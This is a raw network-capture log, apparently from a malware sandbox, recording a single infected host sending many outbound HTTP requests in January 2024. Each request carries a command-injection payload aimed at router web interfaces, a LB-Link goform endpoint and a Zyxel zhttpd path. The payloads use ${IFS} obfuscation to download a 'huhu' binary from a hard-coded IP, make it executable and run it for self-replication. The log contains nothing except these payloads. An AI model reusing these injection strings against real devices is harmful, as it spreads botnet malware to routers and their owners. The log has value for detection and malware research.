                                      Jan 19, 2024 17:29:43.254520893 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7084192.168.2.145546074.96.241.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001410961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7085192.168.2.1440652180.93.25.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001435041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7086192.168.2.1454026191.48.6.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001480103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7087192.168.2.1445516157.253.27.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001555920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7088192.168.2.1456736192.245.173.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001593113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7089192.168.2.1448008197.84.156.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001637936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7090192.168.2.1440196150.215.205.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001684904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7091192.168.2.1441468219.162.154.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001739979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7092192.168.2.1439646117.97.173.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001765013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7093192.168.2.14527989.175.161.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001805067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7094192.168.2.1444302141.214.103.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001830101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7095192.168.2.1448818142.217.196.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001878977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7096192.168.2.1440852118.156.37.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001948118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7097192.168.2.1433092166.147.34.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.001959085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7098192.168.2.145769214.177.242.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002002954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7099192.168.2.145708445.41.50.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002027035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7100192.168.2.144321653.117.192.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002060890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7101192.168.2.1440702195.160.251.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002129078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7102192.168.2.143506414.83.43.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002166033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7103192.168.2.145738614.173.224.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002197981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7104192.168.2.1433850172.160.203.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002224922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7105192.168.2.1442796178.177.3.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002290964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7106192.168.2.1445440107.114.149.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002338886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7107192.168.2.1438028145.247.121.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002367973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7108192.168.2.145318696.254.224.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002437115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7109192.168.2.1435988200.0.22.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002459049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7110192.168.2.144137884.72.173.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002497911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7111192.168.2.1457716149.101.185.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002521992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7112192.168.2.1447448194.207.64.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002583981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7113192.168.2.1452832167.169.121.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002623081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7114192.168.2.145262271.170.187.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002692938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7115192.168.2.1454742143.217.230.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002727032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7116192.168.2.1449700206.147.224.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002763033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7117192.168.2.144891239.206.162.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002810001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7118192.168.2.1454510125.196.208.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002873898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7119192.168.2.145127484.88.229.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002897978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7120192.168.2.144407897.137.7.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002945900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7121192.168.2.145606897.119.185.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.002994061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7122192.168.2.1447894155.22.17.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003007889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7123192.168.2.1449672201.13.123.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003073931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7124192.168.2.1448162159.23.221.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003113031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7125192.168.2.1440288171.63.245.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003160000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7126192.168.2.144677665.7.43.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003212929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7127192.168.2.1452030192.58.184.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003245115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7128192.168.2.1441890223.231.87.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003295898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7129192.168.2.144393654.194.235.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003335953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7130192.168.2.144725424.60.116.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003370047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7131192.168.2.1434730198.45.187.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003403902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7132192.168.2.1444104123.166.175.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003458023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7133192.168.2.145088212.86.22.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003468990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7134192.168.2.145497870.1.118.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003498077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7135192.168.2.144944841.130.17.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003540039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7136192.168.2.145205842.104.125.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003582954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7137192.168.2.1437308196.234.46.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003618002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7138192.168.2.1453398161.116.79.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003667116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7139192.168.2.14582942.129.82.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003689051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7140192.168.2.144123854.132.175.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003716946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7141192.168.2.1449458176.19.14.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003773928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7142192.168.2.1433152119.73.48.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003810883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7143192.168.2.14441585.213.253.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003861904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7144192.168.2.1441322219.162.209.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003901005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7145192.168.2.1456880175.24.105.78443
                                      TimestampBytes transferredDirectionData
